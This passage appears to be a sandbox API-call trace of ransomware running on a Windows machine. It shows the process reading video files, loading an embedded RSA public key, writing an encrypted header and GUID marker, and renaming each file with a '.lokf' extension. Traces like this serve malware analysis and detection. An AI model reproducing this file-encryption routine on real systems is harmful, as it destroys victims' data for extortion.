[0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0061.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87710 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86250 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86238 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86208 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861f0 | out: hHeap=0x660000) returned 1 [0061.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86c38 | out: hHeap=0x660000) returned 1 [0061.075] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbe07, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.075] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.075] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.075] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.076] CloseHandle (hObject=0x5cc) returned 1 [0061.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0061.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0061.076] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\R-9wIEAszo.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\r-9wieaszo.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\R-9wIEAszo.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\r-9wieaszo.mkv.lokf")) returned 1 [0061.078] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x271d5ed0, ftCreationTime.dwHighDateTime=0x1d4cb77, ftLastAccessTime.dwLowDateTime=0xe66a6f90, ftLastAccessTime.dwHighDateTime=0x1d4c987, ftLastWriteTime.dwLowDateTime=0xe66a6f90, ftLastWriteTime.dwHighDateTime=0x1d4c987, nFileSizeHigh=0x0, nFileSizeLow=0x2620, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uGSi-5fGSlAWMRzpgA.mkv", cAlternateFileName="UGSI-5~1.MKV")) returned 1 [0061.078] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0061.078] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0061.078] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\uGSi-5fGSlAWMRzpgA.mkv") returned=".mkv" [0061.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\uGSi-5fGSlAWMRzpgA.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\ugsi-5fgslawmrzpga.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.078] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=9760) returned 1 [0061.078] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.080] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x25fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.080] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.081] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x2620, lpOverlapped=0x0) returned 1 [0061.081] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.081] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.081] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.081] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0061.082] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.082] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.082] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.082] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.082] GetLastError () returned 0x0 [0061.082] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.082] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0061.082] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.082] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.083] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.083] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.083] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2620, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.083] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.083] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.083] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.083] CloseHandle (hObject=0x5cc) returned 1 [0061.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0061.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0061.084] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\uGSi-5fGSlAWMRzpgA.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\ugsi-5fgslawmrzpga.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\uGSi-5fGSlAWMRzpgA.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\ugsi-5fgslawmrzpga.mkv.lokf")) returned 1 [0061.085] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71046760, ftCreationTime.dwHighDateTime=0x1d4cf59, ftLastAccessTime.dwLowDateTime=0x452cec20, ftLastAccessTime.dwHighDateTime=0x1d4c775, ftLastWriteTime.dwLowDateTime=0x452cec20, ftLastWriteTime.dwHighDateTime=0x1d4c775, nFileSizeHigh=0x0, nFileSizeLow=0x13bcb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VNkHkNF_CGKpIBona48.mkv", cAlternateFileName="VNKHKN~1.MKV")) returned 1 [0061.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0061.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0061.085] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\VNkHkNF_CGKpIBona48.mkv") returned=".mkv" [0061.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\VNkHkNF_CGKpIBona48.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\vnkhknf_cgkpibona48.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.086] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=80843) returned 1 [0061.086] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.088] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13ba5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.088] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.089] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x13bcb, lpOverlapped=0x0) returned 1 [0061.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.089] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0061.090] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.090] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.090] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.090] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.090] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.090] GetLastError () returned 0x0 [0061.090] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.090] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0061.090] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.090] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.090] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.090] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.091] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.091] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13bcb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.091] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.092] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.092] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.092] CloseHandle (hObject=0x5cc) returned 1 [0061.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0061.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0061.093] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\VNkHkNF_CGKpIBona48.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\vnkhknf_cgkpibona48.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\VNkHkNF_CGKpIBona48.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\vnkhknf_cgkpibona48.mkv.lokf")) returned 1 [0061.094] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dffa1d0, ftCreationTime.dwHighDateTime=0x1d4c9ac, ftLastAccessTime.dwLowDateTime=0xd4c02cd0, ftLastAccessTime.dwHighDateTime=0x1d4d3e6, ftLastWriteTime.dwLowDateTime=0xd4c02cd0, ftLastWriteTime.dwHighDateTime=0x1d4d3e6, nFileSizeHigh=0x0, nFileSizeLow=0xa02d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zezODkThIh8LWRpIgH.flv", cAlternateFileName="ZEZODK~1.FLV")) returned 1 [0061.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0061.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0061.094] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\zezODkThIh8LWRpIgH.flv") returned=".flv" [0061.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\zezODkThIh8LWRpIgH.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\zezodkthih8lwrpigh.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.094] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=41005) returned 1 [0061.094] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.097] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa007, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.097] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.098] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xa02d, lpOverlapped=0x0) returned 1 [0061.098] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.098] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.098] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.098] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, 